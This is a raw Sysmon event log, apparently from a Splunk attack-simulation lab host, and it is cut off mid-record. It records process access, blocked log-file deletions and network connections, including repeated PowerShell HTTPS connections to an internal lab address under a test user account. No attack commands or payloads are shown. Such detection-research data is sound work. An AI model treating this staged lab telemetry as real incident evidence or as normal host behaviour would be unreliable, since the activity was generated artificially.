14:59:17.398{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342295Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:17.398{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342294Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:17.398{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342293Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:17.398{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342292Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:17.398{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-72C5-613B-30B4-03000000C801}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342291Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:17.398{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-72C5-613B-30B4-03000000C801}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342290Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:17.381{B81B27B7-72C5-613B-30B4-03000000C801}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:18.679{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=457545C60AAB3B5671D9DC93ABE59237,SHA256=DA23918468A1A95A156FB9F4BEF46076B2FC86499D57E45CE3E74B77AC3A4AF2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:18.401{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6A9CD5379AFA7CB980996E0374E6F94A,SHA256=FE6037779209691F1098EBFAB9117F5332AC76C1F597760EF7A67C4463B5D73A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:18.399{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9F3BB5BCD3AE6D71A20CF7A21A86785,SHA256=98F9DA856DB67530126E8E71EA6B63E69CEB5548FE3758AE69A6CBD1BED15992,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:18.100{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-72C6-613B-31B4-03000000C801}532C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:18.097{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:18.096{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:18.096{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:18.096{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:18.096{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-72C6-613B-31B4-03000000C801}532C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:18.096{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-72C6-613B-31B4-03000000C801}532C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:18.080{B81B27B7-72C6-613B-31B4-03000000C801}532C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:19.733{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5BA25CFD1902292FCBB6349804872D7,SHA256=C6E182D77B3888F06D04EAA6950862A1196355ECDDF07E14E5BCAE7B0BF61DEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:44.117{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52412-false10.0.1.12-8000- 23542300x800000000000000035342314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:20.776{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA684C84A36F0E21DD2ADAD7CA37E2FA,SHA256=5B855E8B15EBEA56F8F8C23E163E20AC3C73190AE792BEF39B49422052271ADF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:20.344{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C6E4133FC0D3768DB87B5FA44F3A360A,SHA256=88CA319C9E58DF173D102942A0C1A587D02007689B3D7ED3137CE5BD644B255A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:21.791{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BB9D2C618C76D19F9366D9B9EDF691E,SHA256=3A3F9605B4AC54FF8A280AB5DDE39DBA0F7AEDC03A1D52B47480C5992DA1A869,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:46.234{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52413-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:22.809{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E6DFCD0C796F0F3A32C8EA0554FE317,SHA256=0D7C0C198280CA866F8815EEA046F87BF6240476A29D090EE8C271113515AB7A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:23.874{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F2B2E88D742C308378A1FCA665B8783,SHA256=5E1CE7E926B5957912ADAEDE7BFA87F247C3FF2BB0D41FE9F1B77EE33D9300F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:49.189{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52414-false10.0.1.12-8000- 23542300x800000000000000035342318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:23.012{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:24.907{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB2639A20A6001FFEE298485D971CB12,SHA256=ECA985895A46BA35213B501A18C99DCA2FDD5A4A97D090CAEC659C9C5481A27D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:25.941{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF3B8946891DFDE71A07E4DB42E59C78,SHA256=E126F64B4FAE792FFBFEC751B8BB24A952D170430A1706293BFA0539348DAA4B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:50.011{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52415-false10.0.1.12-8089- 23542300x800000000000000035342322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:25.258{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=92FFCED8744BC808DE9796B9ACBE7036,SHA256=2C74813E962F3488E7DF6CBCCF1495A641B632867014E7BE293AEB4B2761A7C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:26.971{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3744496EFFAB7A2858D20FD959937A9,SHA256=879845DD1234E19E4CD5D2BE383C32CB1335B55C252BA39C6BB3A9943DC0FE4C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:51.243{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52416-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:28.005{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=096883D8D0A6B0CDC9942B7C40AC7A1D,SHA256=66EE3613AF3AB1F5044EB67BCCA5D9A32FEFCFF5157373037D68DA607446F14C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:29.471{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BA362B7689E621A8547183277E150A89,SHA256=9B04850D97FFE7A600448359170107D9C12E7B6C612B41FED8AAC94458382958,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:55.254{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52418-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035342329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:54.202{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52417-false10.0.1.12-8000- 23542300x800000000000000035342328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:29.006{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6625441FA62776CCD63E5D2D3CFC9A59,SHA256=A2F2537D2B3D6B5376200F6306243DB28F0297DBB07D44CFC4264FD8FD798150,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:30.008{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=307EDAC30CD729352F00B86549817CA6,SHA256=6A411066B30060891B5FE50F3DA3DCD8A95E067BDDD3AC05B1CE9381013B3383,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.939{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-72D3-613B-33B4-03000000C801}6044C:\Program 